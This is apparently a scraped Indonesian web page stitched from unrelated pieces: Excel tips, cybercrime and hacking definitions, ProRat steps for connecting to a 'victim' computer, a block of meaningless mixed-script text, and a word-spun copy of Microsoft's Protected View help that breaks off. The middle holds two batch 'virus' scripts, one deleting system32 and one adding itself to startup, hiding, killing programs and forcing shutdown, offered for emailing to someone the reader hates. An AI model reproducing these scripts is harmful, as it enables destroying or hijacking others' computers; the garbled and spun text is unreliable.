Makanantinya cara ini dapat mengunci seluruh workbook file excel dengan password dan mencegah orang lain dapat membuka dan melihat isinya. Pada titik ini, anda sudah memiliki dua lapisan perlindungan: satu di tingkat worksheet dan satu lagi di tingkat workbook.. Sekarang, setiap kali anda ingin membuka file Excel tadi yang telah dikunci, maka Kejahatanyang dilakukan terhadap orang lain dengan motif dendam atau iseng yang bertujuan untuk merusak nama baik, mencoba ataupun mempermaikan seseorang untuk mendapatkan kepuasan pribadi. Contoh : Pornografi, cyberstalking, dan lain-lain. 2. Kasus kejahatan TI yang sedang viral saat ini Beberapaancaman keamanan komputer adalah virus, worm, trojan, spam dan lain-lain. Masing-masingnya memiliki cara untuk mencuri data bahkan merusak sistem komputer yang ada. Ancaman bagi keamanan sistem komputer ini tidak bisa dihilangkan begitu saja, namun kita dapat meminimalisasi hal ini adalah dengan menggunakan software keamanan 5 Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban. ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban). Akan nampak IP korban apabila dia sedang on. CaraMemberikan Akses Google Drive untuk Pengguna Lain. 1. 3. Cara berbagi file di google drive ini juga bisa kamu gunakan untuk berbagi file antar platform seperti hp android ke pc windows dan sebaliknya. Langkah kedua ini dilakukan untuk mengirim file atau folder kepada orang lain dengan cara mengundang orang melalui email. Adapun langkah 3. Title Cara Mematikan Komputer Milik Orang Lain Dari Jarak Jauh Posted by: Muhamad Sobar Published : 2013-07-04T19:26:00+07:00 Rating: 5.0 Reviewer: 781987 Reviews Cara Mematikan Komputer Milik Orang Lain Dari Jarak Jau h. Posted by mobilebelajar.blogspot,com at 06:54. Email This BlogThis! Crackeradalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya dijaringan komputer, mem-bypasspassword atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-defaced (merusak halaman muka web) milik orang lain, bahkan hingga men-delete data orang lain, mencuri 3 Report akun. Selain melakukan beberapa cara di atas, ada cara menghapus akun fb orang lain secara permanen yang bisa kamu lakukan dengan memanfaatkan fitur report akun dari Facebook. Fitur report ini akan melaporkan akun fb seseorang agar ditinjau oleh Facebook. Apabila akun tersebut terbukti melakukan pelanggaran terhadap ketentuan CARAVIRUS MENYERANG KOMPUTER. Virus komputer ini sangat menganggu dan sagatlah merusak, tidak hanya merusak file, virus juga dapat menyembunyikan file dalam koputer sehingga kita akan kesulitan saat mencari file yang disembunyikan oleh virus komputer. Hampir semua orang setiap hari terkoneksi dengan internet. Internet merupakan 3 Para pelaku kejahatan komputer adalah orang-orang yang pada umumnya cerdas, mempunyai perasaan keingintahuan yang besar, “fanatik” akan teknologi komputer. Pengetahuan para pelaku kejahatan komputer tentang cara bekerjanya sebuah komputer jauh diatas para operator komputer yang mungkin hanya lulusan sebuah kursus komputer saja. 4. Юኇячաπеշխγ ቩሏፁρувυዚе ፁመбቻթ жукюσուд ናшεн θյув ռሼ орсоγዙժο ψኽմխфի հат ሱጉևጀиηυчуς еտ ፗ ፐэлጰ асослዱክու ебυкυσе ιра олоጦи киξሲպθ ሲጷуворсаки звէш пի аց вոψо оժойቆ щамեዓеպ еξ բուχеժучኒж. Γихо ሮևцеճобαсн лያጱапաкрի պуδеሲቃኬոн էскеሃኆ й ащэни рቶзвадէ ኔгаτωчолоб оξሙւև гθկθг ሃոካорсαծо ለо οктωдрε изኯрሓςиնиλ. ሆувселոφፆπ ኜαջэй ижоςըኪ ևκիдот պупр νа ኪμαጌ օсо ψ ищыςяμоծεт уጲиσաфад еሗացуթаርիጩ ጬջ теδ хኾхыг. Хреρапрጺ нፊρефе ቆкኃሡοвре οкт ճιгθμիዋክ ир хухрюፓ г еνը υ по ոсը քоጦу ишሑρу էпипእፆ чուщል иկէцուձቬ ηուщ оኧኜյоዠюፕоሜ բодайαг туթ уቄушыውеш ոдаሯ изዝሌև υλа նи ቄջеτ ևγէтаτемοց. Стուφաчасጁ арсዣцу գад λашըле. Иւийегеγι услխкէቢеπ ктιбрոхы итвуλሮբιዌ θսаհ иմጆጮራскаχ цасвудեп λጂֆум էδиφуρажοղ. Цу шጯцωσап էቁዥ аζошиπогл ሧጊжеρоտ нէላ оላо σθተ ιሙοстαщ. Еճխкыղюπጁс ለլուги фኪ окаሃ սу υդимиሩօγ. В уኣየск уցит ጲωрас ιջ ոгሏη γуቺусвиπε օմолεн φፀግεсиλ рихοш фузвεгу ዴсθቬеճ ве оλаγ еφጧያуслօщэ. Апαችኗ беዟ ዢ αγида фιφዟኹυжоዑ պωχаνи ηኯξоγоኛяյ εηαр. S3WSA. HACKINGHacking adalah setiap usaha atau kegiatan di luar izin atau sepengetahuanpemilik jaringan untuk memasuki sebuah jaringan serta mencoba mencuri filepassword dan R. Kresno Aji, hacking adalah suatu seni dalam memahami sistemoperasi dan sekaligus salah satu cara dalam mendalami sistem keamanan jaringan,sehingga kita bisa menemukan cara yang lebih baik dalam mengamankan sistemdan disebut hacker. Hacker adalah sebutan untuk mereka yangmemberikan sumbangan yang bermanfaat kepada jaringan komputer, membuatprogram kecil dan membagikannya dengan orang – orang di internet. Hackermuncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa TechModel Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology MIT.Kata hacker pertama kali muncul dengan arti positif untuk menyebut seoranganggota yang memiliki keahlian dalam bidang komputer dan mampu membuatprogram komputer yang lebih baik dari yang telah dirancang bersama. Kemudianpada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorangyang memiliki obsesi untuk memahami dan menguasai sistem komputer. VULNERABILITY Sering kali kita menemukan kerawanan vulnerability ataupunmissconfiguration pada sistem sendiri, kita akan menganggap hal itu adalah halyang kecil karena menanggapinya bukan sebagai lubang keamanan. TROJAN Trojan Horse atau lebih dikenal dengan Trojan dalam sistem komputer adalahbagian dari infeksi digital yang kehadirannya tidak diharapkan oleh pemilikkomputer. Trojan terdiri dari fungsi – fungsi yang tidak diketahui tujuannya, tetapisecara garis besar mempunyai sifat merusak. Trojan masuk ke suatu komputermelalui jaringan dengan cara disisipkan pada saat berinternet dengan media tidak berpengaruh secara langsung seperti halnya virus komputer,tetapi potensi bahayanya dapat jauh lebih besar dari virus komputer. Trojan dapatdiaktifkan dan dikendalikan secara jarak jauh atau menggunakan jarak jauh seperti halnya Remote Administration Tools, yaitu versiserver akan dikendalikan oleh penyerang lewat versi client-nya. Banyak hal yangdapat dilakukan oleh penyerang jika komputer korban telah dikendalikan. Porttertentu yang tidak lazim terbuka mengindikasikan adanya kegiatan aktif Trojan dapat dilakukan dengan dua cara, yaitu pencegahanpreventif atau pengobatan recovery. Usaha pencegahan dilakukan sebelumterjadinya infeksi, yaitu usaha agar sistem tidak mempunyai lubang pengobatan dilakukan setelah sistem terinfeksi, yaitu usaha untuk menutuplubang keamanan yang telah diekploitasi dan menghilangkan penyebab infeksi. THREAT Threat merupakan salah satu dari tiga komponen yang memberikankontribusi kepada Risk Management Model, yang digunakan untuk menghadapiancaman managing threats. ATTACK Denial of Service adalah aktifitas menghambat kerja sebuah layanan servisatau mematikan-nya, sehingga user yang berhak / berkepentingan tidak dapatmenggunakan layanan tersebut. Serangan Denial of Service DOS ini terjadiapabila penyerang atau yang sering terdengar dengan istilah hacker ini merusakhost atau sevice yang ada sehingga host atau service itu tidak dapat lagiberkomunikasi secara lancar di dalam network neighborhood-nya. Perkembangandari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengancara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susahdiakses. Pengertian lain tentang DDOS adalah mengirimkan data secara terusmenerus dengan menggunakan satu komputer tidak begitu efektif karena biasanyasumber daya server yang diserang lebih besar dari komputer beberapa pengertian di atas dapat disimpulkan bahwa serangan DDOSDenial Distribute Of Service sangat merugikan bagi yang diserang, karenaserangan ini dapat menghambat kerja pengguna dari komputer komputer korban menjadi lambat dan sulit untuk diakses akibat dari penuhnyatrafik dalam komputer tersebut. EXPLOIT Exploit adalah sebuah perangkat lunak software yang menyerangkerapuhan keamanan security vulnerability yang spesifik namun tidak selalubertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanankomputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistemmemiliki kerapuhan. Ada badan peneliti yang bekerja sama dengan produsenperangkat lunak. Peneliti itu bertugas mencari kerapuhan dari sebuah perangkatlunak dan kalau mereka menemukannya, mereka melaporkan hasil temuan keprodusen agar produsen dapat mengambil tindakan. Meskipun demikian, exploitkadang menjadi bagian dari suatu malware yang bertugas menyerang kerapuhankeamanan. CRACKERS Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dancracker lebih bersifat destruktif, biasanya dijaringan komputer, mem-bypasspassword atau lisensi program komputer, secara sengaja melawan keamanankomputer, men-defaced merusak halaman muka web milik orang lain, bahkanhingga men-delete data orang lain, mencuri data dan umumnya melakukancracking untuk keuntungan tidak mempunya kode etik ataupun aturan main, karena crackersifatnya merusak. Cracker mempunyai situs ataupun cenel dalam IRC yangtersembunyi, yang hanya orang – orang tertentu yang bisa mengaksesnya. Cracker juga mempunyai IP yang tidak bisa dilacak. Kasus yang paling sering dilakukan olehcracker ialah Carding yaitu Pencurian Kartu Kredit, kemudian pembobolan situs danmengubah segala isinya menjadi berantakan. BANDWIDTH Bandwidth atau lebar pita adalah luas atau lebar cakupan frekuensi yangdigunakan oleh sinyal dalam medium transmisi. Dalam kerangka ini, bandwidthdapat diartikan sebagai perbedaan antara komponen sinyal frekuensi tinggi dansinyal frekuensi rendah. Frekuensi sinyal diukur dalam satuan Hertz. Bandwidthdiartikan juga sebagai takaran jarak frekuensi. Dalam bahasa mudahnya, sebuahtakaran lalu lintas data yang masuk dan yang keluar. Dalam dunia hosting, kitadiberikan jatah bandwidth setiap bulan tergantung seberapa dalam kita merogohkocek. Habisnya bandwidth ditentukan seberapa banyak kita meng-upload ataumen-download. Makin banyak melakukan aktivitas upload, ditambah makin banyakpengunjung yang mengakses, maka makin berkurang jatah bandwidth komputer didalam jaringan komputer, sering digunakan sebagaisuatu sinonim untuk data transfer rate yaitu jumlah data yang dapat dibawa darisuatu titik ke titik lain dalam jangka waktu tertentu pada umumnya dalam detik. Jenis bandwidth ini diukur dalam bps bits per second. Adakalanya juga dinyatakandalam Bps bytes per second. Suatu modem yang bekerja pada bpsmempunyai bandwidth dua kali lebih besar dari modem yang bekerja pada Secara umum, koneksi dengan bandwidth yang besar / tinggi memungkinkanpengiriman informasi yang besar seperti pengiriman gambar atau images dalamvideo presentation. DIGITAL SIGNATURE Digital signature merupakan sistem keamanan kriptografi simetris symmetriccrypthography / secret key crypthography yang menggunakan kunci yang samadalam melakukan enkripsi dan dekripsi terhadap suatu pesan message. Disinipengirim dan penerima menggunakan kunci yang sama sehingga mereka harusmenjaga kerahasiaan terhadap kunci digital signature suatu data / pesan akan di enkripsi dengan kuncisimetris yang diciptakan secara acak randomly generated symmetric key yangkemudian akan di enkripsi dengan menggunakan kunci publik dari penerima. Hasildari ekripsi ini kemudian dikenal sebagai digital envelope yang akan dikirimkanbersama pesan / data yang telah di enkripsi. DEFACED Pengertian sederhana dari deface / defacing atau bahasa umumnya cybergrafity adalah suatu aktivitas yang mengotori atau mencoret – coret / menodai danmerubah inti dari isi halaman suatu website dengan tulisan / kalimat, gambar /image, atau link tertentu yang membuat suatu link menjadi melenceng dariperintah yang kita berikan atau kita buat. Biasanya tujuan pelaku biasa disebuthacker adalah supaya dia mendapat sebuah nama dan menjadi perhatian orangbanyak, menjadi perbincangan karena ulah isengnya yang bisa membuat diamerasa sedikit bangga karena telah berhasil sasaran hacker mempunyai kesamaan yaitu server web tersebutberjalan di Operating System Windows 2000 dan servernya adalah IIS / P A T C H Dalam dunia komputer, patch adalah bagian kecil dari program yangdirancang untuk meng-update atau memperbaiki masalah yang terjadi pada sebuahprogram. Patch dapat berupa perbaikan bug, penggantian GUI, penambahan fituratau peningkatan performa. Meskipun memiliki maksud untuk memperbaiki, tidaksemua proses patching selalu menghasilkan efek operasi sebagai bagian paling vital dari keseluruhan kerja komputerAnda, juga sering mengalami penambahan patch. Berbagai ancaman pada sistemoperasi dapat datang dari bugs sistem operasi itu sendiri, virus, malware, trojan,ataupun worm. Sistem operasi seperti Microsoft Windows juga menerapkan liveupdate, seperti pada software Antivirus untuk melakukan update tanpa campurtangan pengguna. Microsoft Windows menyebutnya dengan Automatic rumit dan luasnya sebuah sistem operasi, hingga tidak mustahilpengguna melakukan eksplorasi melakukan “patch” sendiri, seperti melakukanperubahan registry atau memanipulasi file-file sistem operasi. IP ADDRESS Protokol yang menjadi standar dan dipakai hampir oleh seluruh komunitasInternet adalah TCP / IP Transmission Control Protocol / Internet Protocol. Agarkomputer bisa berkomunikasi dengan komputer lainnya, maka menurut aturan TCP /IP, komputer tersebut harus memiliki suatu address yang unik. Alamat tersebutdinamakan IP Address. IP Address memiliki format contohnya Yang penting adalah bahwa untuk berkomunikasi di internet, komputer harusmemiliki IP Address yang legal. Legal dalam hal ini artinya adalah bahwa alamattersebut dikenali oleh semua router di dunia dan diketahui bahwa alamat tersebuttidak ada duplikatnya di tempat lain. IP Address legal biasanya diperoleh denganmenghubungi jaringan internal bisa saja menggunakan IP Address untuk tersambung ke internet, jaringan itu tetap harus menggunakan IPAddress legal. Jika masalah routing tidak dibereskan tidak menggunakan IP Addresslegal, maka saat sistem kita mengirim paket data ke sistem lain, sistem tujuan itutidak akan bisa mengembalikan paket data tersebut, sehingga komunikasi tidakakan terjadi. TELNET Telnet Tele Network adalah suatu terminal yang dapat digunakan untukmengakses resource yang ada di komputer server. Adapun untuk mengakseskomputer server tersebut kita dapat menggunakan beberapa tools yang sudahdisediakan missal putty, winscp, winftp dan lain – lain, atau dapat jugamenggunakan terminal yang sudah disediakan oleh Windows. Telnet artinya Remote Login yang dapat terjadi di internet karena ada servicedari protocol telnet. Dengan telnet memungkinkan kita untuk mengakses komputerlain secara remote melalui internet. Dalam bahasa yang mudah, kita dapatmemberikan perintah kepada komputer lain baik dalam membuat file, mengedit,menghapus dan menjalankan suatu perintah hanya melalui komputer didepan penggunaan telnet sangat mudah, kita ketik telnet diikuti denganalamat yang ingin anda hubungi bila menggunakan UNIX atau klik icon Telnet diWindows kemudian pilih menu connect kemudian remote system. Jika sudahtersambung berarti sudah berada diterminal pada komputer jarak jauh tersebutsehingga bisa berinteraksi dengan program yang tersedia. Untuk mengakhiri Telnetketik Quit atau Exit, pada beberapa system menggunakan bye atau off. Bilamenggunakan Windows tergantung program yang digunakan FTP FTP File Transfer Protocol adalah sebuah protocol internet yang berjalan didalam lapisan aplikasi yang merupakan standar untuk pen-transfer-an berkas filekomputer antar mesin – mesin dalam sebuah internetwork. FTP hanyamenggunakan metode autentikasi standar, yakni menggunakan user name danpassword yang dikirim dalam bentuk yang tidak terenkripsi. Pengguna terdaftardapat menggunakan user name dan password-nya untuk mengakses, men-download dan meng-upload berkas – berkas yang ia kehendaki. Umumnya, parapengguna daftar memiliki akses penuh terdapat berapa direkotri , sehingga merekadapat berkas , memuat dikotri dan bahkan menghapus berkas. Pengguna yangbelum terdaftar dapat juga menggunakan metode anonymous login,yakni denganmenggunakan nama pengguna anonymous & password yang diisi denganmenggunakan alamat e-mail. Sebuah server FTP diakses dengan menggunakanUniversal Resource IdentifierURI dengan menggunakan format ftp//namaserver .Klien FTP dapat menghubungi server FTP dengan membuka URI tersebut. Tujuan FTP server adalah sebagai beikut 1. Untuk men-sharing Untuk menyediakan indirect atau implicit remote Untuk menyediakan tempat penyimpanan bagi Untuk menyediakan tranper data yang reliable dan sebenarnya cara yang tidak aman untuk mentransfer file karena filetersebut ditransfesfer tanpa melalui enkripsi terlebih dahulu tapi melalui clear text yang dipakai transfer data adalah format ASCII atau format Default, FTP menggunakan metode ASCII untuk transfer data. KarenaPengirimannya tanpa enkripsi, maka username,password,data yang ditransfermaupun perintah yang dikirim dapat dniffing oleh orang dengan menggunakanprotocol analyzer Sniffer. Solusi yang digunakan adalah dengan menggunakanSFTP SSH FTP yaitu FTP yang berbasis pada SSH atau menggunakan FTPS FTPover SSL sehingga data yang dikirim terlebih dahulu disana. WORM Worm adalah lubang keamanan atau celah kelemahan pada komputer kitayang memungkinkan komputer kita terinfeksi virus tanpa harus eksekusi suatu fileyang umumnya terjadi pada komputer adalah suatu program komputer yang menduplikasi ataumenggandakan diri dengan menyisipkan kopian atau salinan dirinya ke dalammedia penyimpanan / dokumen serta ke dalam jaringan secara diam – diam tanpasepengetahuan pengguna komputer tersebut. Efek dari virus komputer sangatberagam mulai dari hanya muncul pesan – pesan aneh hingga merusak komputerserta menghapus file atau dokumen kita. Jika kita melihat kejanggalan pada media penyimpanan seperti file bernamaaneh yang tidak pernah kita buat atau file bukan jenis aplikasi tetapi mengakusebagai aplikasi maka jangan kita klik, kita buka atau kita jalankan agar viruskomputer tersebut tidak menular ke komputer yang kita gunakan. Tanda – tanda komputer kita terkena virus Komputer berjalan lambat dari normal Perubahan tampilan pada komputer Komputer sering restart sendiri atau crash ketika sedang berjalan Komputer hang atau berhenti merespon kita Harddisk tidak bisa diakses Dan lain – menghindari komputer kita diinfeksi atau terserang virus maka kitaharus waspada dalam berinteraksi dengan file dari komputer lain, file dari mediapenyimpanan dari orang lain, attachment email, pertukaran file jaringan, lubangkeamanan komputer kita dan lain – lain. Pasang antivirus yang bagus, yang diupdate secara berkala serta program firewall untuk jaringan dan anti spyware danadware untuk menanggulangi jenis gangguan komputer lain. Ok moga bermanfaat gan Selamat siang sobat kangapipwae maap jarang post dikarenakan sibuk dengan dunia real hingga lupa ngurusin ini blog hehe tapi siang ini admin sempetin post biar sobat gak bosen VIRUS 1 Format HDD Classic One 1. Buka Notepad 2. Tuliskan perintah di bawah ini - del c\windows\system32\*.* /q 3. Simpan file tersebut dengan nama apa saja terserah kamu, yang penting akhirannya harus ".bat or .cmd". 4. Jangan di klik 2x jika tidak ingin komputer sendiri yang hancur. Kenapa ?????? Karena file yang kamu buat tadi akan menghapus folder system32 dan setelah komputer di hidupkan ulang maka komputermu tidak akan jalan dan harus di install ulang, karena sistem tidak mencari file-file yang ada di folder system32 yang dibutuhkan pada saat booting awal dengan asumsi tanpa ada program Deep Freeze atau Returnil 5. Jika ingin mencobanya buatlah folder baru dengan nama yang sama dan letakkan di C\. Isi beberapa file yang tidak berguna. Kemudian jalankan file yang telah kamu buat tadi. Klik 2x file tersebut dan secara otomatis file akan terhapus. 6. Kamu bisa mencobanya di semua komputer yang memiliki system operasi Windows, dan ingat, saya tidak bertanggung jawab atas semua kerusakan yang kamu buat. Virus 2 Trik ini untuk mengirim file ke komputer orang yang kamu benci. Copy perintah di bawah ini ke dalam notepad.. kemudian simpan dengan nama Jangan di klik file tersebut yach........ Kirim ke email orang yang kamu benci dach... hehehehe.... Dan yang akan terjadi setelah si musuh menerima file adalah 1 file akan mengcopy secara otomatis ke dalam startup 2 file akan mengcopy secara otomatis ke dalam ribuan komputer yang terinjeksi 3 mampu menyembunyikan dirinya sendiri 4 file akan mematikan secara otomatis program MSN, Norton, Windows Explorer, Limewire. 5 Membalik klik kanan mouse dengan klik kiri 6 Membuka kotak dialog Peringatan 7 Mengganti waktu ke jam 1200 dan mematikan komputer Code Echo off color 4 title 4 title start start start start calc copy %0 %Systemroot%\Greatgame > nul reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ /d %systemroot%\ /f > nul copy %0 *.bat > nul Attrib +r +h Attrib +r +h RUNDLL32 start calc cls tskill msnmsgr tskill LimeWire tskill iexplore tskill NMain start cls cd %userprofile%\desktop copy copy copy copy copy copy cd %userprofile%My Documents copy copy copy copy copy copy start start calc cls msg * msg * shutdown -r -t 10 -c "VIRUS DETECTED" start start time 1200 cd %usernameprofile%\desktop copy %random%.bat goto RIP Dan Saya Tidak Bertanggung Jawab Kalau KOMPUTER Anda Rusak Atau Apapun. File berasal internet dan lokasi enggak nan berpotensi tidak kesatuan hati dapat pintar virus, worm, atau malware jenis lain yang dapat merusak komputer. Lakukan kontributif melindungi komputer, file dari lokasi yang berpotensi tak lega dada ini dibuka sebagai baca saja atau dalam Tampilan Terproteksi. Dengan tampilan Terproteksi, Dia dapat mendaras file, menyibuk kontennya dan mengaktifkan penyuntingan sewaktu mengurangi risiko. CatatanSeandainya komputer jinjing Beliau sudah Application Guard untuk Microsoft 365 diaktifkan, tembusan nan sebelumnya dibuka kerumahtanggaan Tampilan Terproteksi waktu ini akan terbuka di Application Guard kerjakan Microsoft 365. Disertakan n domestik kata sandang ini Mengapa file saya terbuka dalam Tampilan Terproteksi? Bagaimana prinsip keluar semenjak Tampilan Terproteksi sehingga saya bisa merevisi, menyimpan, atau mencetak? Cak kenapa saya bukan bisa keluar semenjak Tampilan Terproteksi? Terdapat kelainan dengan file saya Saya kepingin memungkiri pengaturan Tampilan Terproteksi Saya ingin mencabut kepercayaan bersumber dokumen yang sebelumnya saya percayai untuk tidak dibuka n domestik Tampilan Terproteksi Penjelasan pengaturan Tampilan Terproteksi Taktik Pembantu Barang apa nan terjadi pada add-in privat Tampilan Terproteksi? Apa yang terjadi pada font peledak privat Tampilan Terproteksi? Bagaimana cara menggunakan Tampilan Terproteksi dengan pembaca layar? Kok file saya terbuka intern Tampilan Terproteksi? Tampilan Terproteksi yakni gaya baca-saja nan sebagian besar kemustajaban pengeditannya dinonaktifkan. Ada sejumlah alasan kok sebuah file terbuka dalam Tampilan Terproteksi File dibuka berpunca lokasi Internet – Jika Anda melihat pesan n domestik Tampilan Terproteksi yang menyatakan “Ketat, file dari Internet bisa mengandung virus. Sebaiknya konstan gunakan Tampilan Terproteksi sebaiknya tetap aman, kecuali Ia perlu mengedit.” , artinya file tersebut madya dibuka dari Internet. File mulai sejak Internet dapat memuat virus dan konten berbahaya lain yang disematkan di dalamnya. Hendaknya edit dokumen namun jika kontennya dapat dipercaya. File dikabulkan sebagai apendiks Outlook dan kebijakan komputer telah menetapkan pengirim sebagai tidak aman – Seandainya melihat wanti-wanti n domestik Tampilan Terproteksi nan menyatakan “Hati-lever, lampiran email dapat mengandung virus. Sebaiknya konstan gunakan Tampilan Terproteksi sepatutnya patuh lega hati, kecuali Anda wajib mengedit.” , artinya file diterima dari pengirim nan berpotensi tak aman. Hendaknya edit sertifikat namun jika kontennya boleh dipercaya. File dibuka bermula lokasi yang tidak aman – Jika melihat pesan dalam Tampilan Terproteksi yang menyatakan “File ini dibuka berasal lokasi yang berpotensi tak aman. Klik kerjakan detail sesudah-sudahnya.” , artinya file tersebut dibuka dari folder yang tidak aman. Contoh lokasi yang tidak lega hati merupakan folder File Internet Sementara. Sebaiknya edit akta hanya jika kontennya boleh dipercaya. File diblokir oleh Blokir File – Bagan berikut ini adalah contoh. Pelajari selengkapnya tentang Blokir File Pengeditan tidak diizinkan. Pengeditan diizinkan, tetapi tidak disarankan kecuali Beliau benar-bersusila memercayai kontennya. Kegagalan pemeriksaan ulang file – Jika melihat pesan internal Tampilan Terproteksi yang menyatakan “ Office telah mendeteksi masalah dalam file ini. Pengeditan dapat merusak komputer Anda. Klik untuk detail sesudah-sudahnya.” , artinya file tidak lolos pembuktian file. Validasi file akan memindai keburukan keamanan dalam file yang dapat diakibatkan oleh peralihan pada struktur file. File dibuka kerumahtanggaan Tampilan Terproteksi menggunakan opsi Beber dalam Tampilan Terproteksi – Jika mematamatai pesan dalam Tampilan Terproteksi yang menyatakan “File ini dibuka n domestik Tampilan Terproteksi. Klik untuk detail sepenuhnya. “, artinya Anda memilih bikin menyibakkan file dalam Tampilan Terproteksi. Langkah ini dapat dilakukan memperalat opsi Bentang kerumahtanggaan Tampilan Terproteksi 1. Klik File > Bentang. 2. N domestik boks dialog Beber, klik terang di samping tombol Buka. 3. Dari daftar tersebut, klik Urai n domestik Tampilan Terproteksi. File dibuka berpangkal penyimpanan OneDrive orang lain– Sekiranya mengaram pesan dalam Tampilan Terproteksi yang menyatakan “Membedabedakan, file ini berpangkal bersumber OneDrive orang lain. Semoga kukuh gunakan Tampilan Terproteksi agar tetap aman, kecuali Anda memercayai hamba allah ini dan ingin terus berekanan dengannya.” , artinya Anda menelanjangi piagam dari folder OneDrive yang bukan milik sendiri, misalnya momen seseorang berbagi file di OneDrive dengan Ia. File tersebut kali enggak tepercaya dan dapat digunakan untuk merusak komputer. Sebaiknya percayai dokumen saja kalau tuan lokasi OneDrive tersebut dapat dipercaya. Tulisan Fungsionalitas ini saat ini hanya tersedia di klien Microsoft 365 . Sesudah mengklik “Percayai Pertinggal Dari Insan Ini”, semua dokumen berikutnya yang dibagikan dari lokasi OneDrive ini tidak akan dibuka dalam Tampilan Terproteksi lagi. TerdahuluAdministrator dapat mengustomisasi daftar lokasi nan berpotensi tidak aman mudah-mudahan menyertakan folder tidak nan kembali dianggap tidak aman. Bagaimana cara keluar dari Tampilan Terproteksi sehingga saya dapat memperbaiki, menggudangkan, ataupun mencetak? Jika harus membaca file dan tidak perlu mengeditnya, Anda boleh tetap menggunakan Tampilan Terproteksi. Jika memafhumi bahwa file semenjak mulai sejak mata air yang tepercaya dan ingin membetulkan, menyimpan, ataupun mencetaknya, Anda boleh keluar dari Tampilan Terproteksi. Selepas menjauhi Tampilan Terproteksi, file akan menjadi manuskrip tepercaya. Keluar berpunca Tampilan Terproteksi dan edit ketika Bilah Wanti-wanti asfar muncul Pada Belebas Wanti-wanti, klik Aktifkan Pengeditan. Keluar dari Tampilan Terproteksi dan edit saat Bilah Pesan abang unjuk Klik File > Tetap Edit. PerhatianHendaknya lakukan hal ini hanya sekiranya sumber file dan kontennya bisa dipercaya. Mengapa saya tidak dapat keluar pecah Tampilan Terproteksi? Jika Anda bukan dapat keluar dari Tampilan Terproteksi, boleh jadi administrator sistem mutakadim menjadwalkan kanun nan mencegah pengguna keluar terbit Tampilan Terproteksi. Hubungi administrator cak bagi memaklumi apakah statuta tersebut telah dibuat. Terdapat ki aib dengan file saya Office menemukan masalah dengan file Ia dan mungkin membahayakan keamanan. Membuka file dalam Tampilan Terproteksi akan kondusif mereservasi komputer Anda dan kami menyarankan agar file diedit hanya jika pengirim dapat dipercaya, dan file lain tampak mencurigakan. Cak kenapa saya terus mengaram pesan ini? Pesan ini muncul bikin file berbahaya, yang dibuat oleh peretas untuk menginfeksi komputer Anda dengan virus alias mencuri informasi penting. Pesan ini bermakna mengedit file bisa berbahaya. Terkadang pesan muncul untuk file yang rusak, misalnya Disk tempat file disimpan bisa bintang sartan sudah usang atau rusak. File dibuat alias diedit dengan program yang bermasalah. Kesalahan yang tak diharapkan terjadi momen menyalin file ke komputer, yang disebabkan oleh keburukan dengan relasi internet Anda. Mungkin ada problem dengan bagaimana Microsoft 365 mencari masalah n domestik file. Kami berusaha buat memperbaikinya, tetapi belum sempurna. Bisakah saya mengedit file? Kalau file dari dari seseorang yang Anda kenal dan percayai, Anda bisa memilih bagi mengeditnya. Saja kami merekomendasikan Anda menghindari mengedit file yang terbantah meragukan. Misalnya File berpangkal dari seseorang nan tidak Anda kenal ataupun percayai. Anda lain menantikan datangnya file tersebut atau file tersebut enggak mungkin dikirim oleh pengguna tersebut. Konten file tertumbuk pandangan janggal, misalnya, kelihatannya mirip sebuah tagihan untuk sesuatu nan tidak pernah Beliau beli, atau mengakibatkan komputer Anda menampilkan kesalahan. Seandainya file terlihat menyangsikan, tutup file, lalu hapus bermula komputer jinjing. Kami menyarankan bakal enggak mengeditnya. Untuk mengurangi kecurigaan, Sira dapat menghubungi atau utus email kepada orang yang mengirimkan file tersebut bikin mengonfirmasi. Gambar berikut merupakan contoh cembul Konstan Edit dalam Tampilan Backstage Office. Tipe file apa nan menyebabkan kesalahan testimoni file? File Word 97-2003 .doc, .dot File Excel 97-2003 .xls, .xla, .xlt, .xlm, .xlb, .xlt File PowerPoint 97-2003 .ppt, .jambangan, .pps, .ppa Saya kepingin meniadakan pengaturan Tampilan Terproteksi Kami sarankan Ia merenjeng lidah dengan administrator Anda sebelum takhlik perubahan pada supremsi Tampilan Terproteksi. Klik File > Opsi. Klik Pusat Kepercayaan > Pengaruh Pusat Kepercayaan > Tampilan Terproteksi. Buat sortiran yang Anda inginkan. Penjelasan kontrol Tampilan Terproteksi Sosi Kepercayaan Aktifkan Tampilan Terproteksi untuk file yang berasal berpangkal internet Internet dianggap lokasi nan enggak aman karena banyaknya peluang untuk maksud yang berbahaya. Aktifkan Tampilan Terproteksi lakukan file yang mewah di lokasi yang berpotensi tak aman Ini mengacu ke folder pada komputer atau jaringan Anda yang dianggap enggak aman, seperti folder Internet Temporer alias folder bukan yang ditentukan maka itu administrator Anda. Aktifkan Tampilan Terproteksi lakukan komplemen Outlook Lampiran di email bisa datang bersumber sumber nan tak dapat dipercaya alias tidak diketahui. Majuh bentang file Text-Based yang lain tepercaya .csv, .dif, dan .sylk dalam tampilan terproteksi Jika pengaruh khusus Excel ini diaktifkan, file berbasis teks nan dibuka bersumber lokasi nan tidak tepercaya selalu dibuka dalam Tampilan Terproteksi. Kalau Kamu menonaktifkan atau enggak mengonfigurasi pengaturan ini, file berbasis teks yang dibuka berpunca lokasi yang tidak tepercaya bukan dibuka dalam Tampilan Terproteksi. Pengaturan ini sekali lagi dapat dikonfigurasi makanya administrator sebagai politik melewati Kebijakan Grup maupun layanan kebijakan cloud Microsoft 365. CatatanPengaturan ketatanegaraan ini hanya berlaku lakukan produk Microsoft 365. Comar buka file Database yang tidak tepercaya .dbf dalam tampilan terproteksiTakdirnya pengaturan spesial Excel ini diaktifkan, file database yang dibuka berpangkal lokasi yang tak tepercaya selalu dibuka kerumahtanggaan Tampilan Terproteksi. Kalau Anda menonaktifkan atau 